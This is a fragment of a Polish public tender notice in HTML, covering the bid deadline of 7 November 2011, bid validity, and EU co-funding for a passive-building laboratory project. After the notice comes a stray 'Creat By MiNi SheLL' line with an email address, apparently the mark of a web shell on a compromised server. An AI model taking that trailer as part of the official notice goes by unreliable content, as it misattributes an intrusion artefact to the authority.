<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego, bud.10-24, Ip. , pok.110.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.11.2011 godzina 10:30, miejsce: w siedzibie Zamawiającego, bud.10-24, Ip. , pok.110.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> w przypadku otrzymania dofinansowania refundacja w ramach projektu Małopolskie Laboratorium Budownictwa Pasywnego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com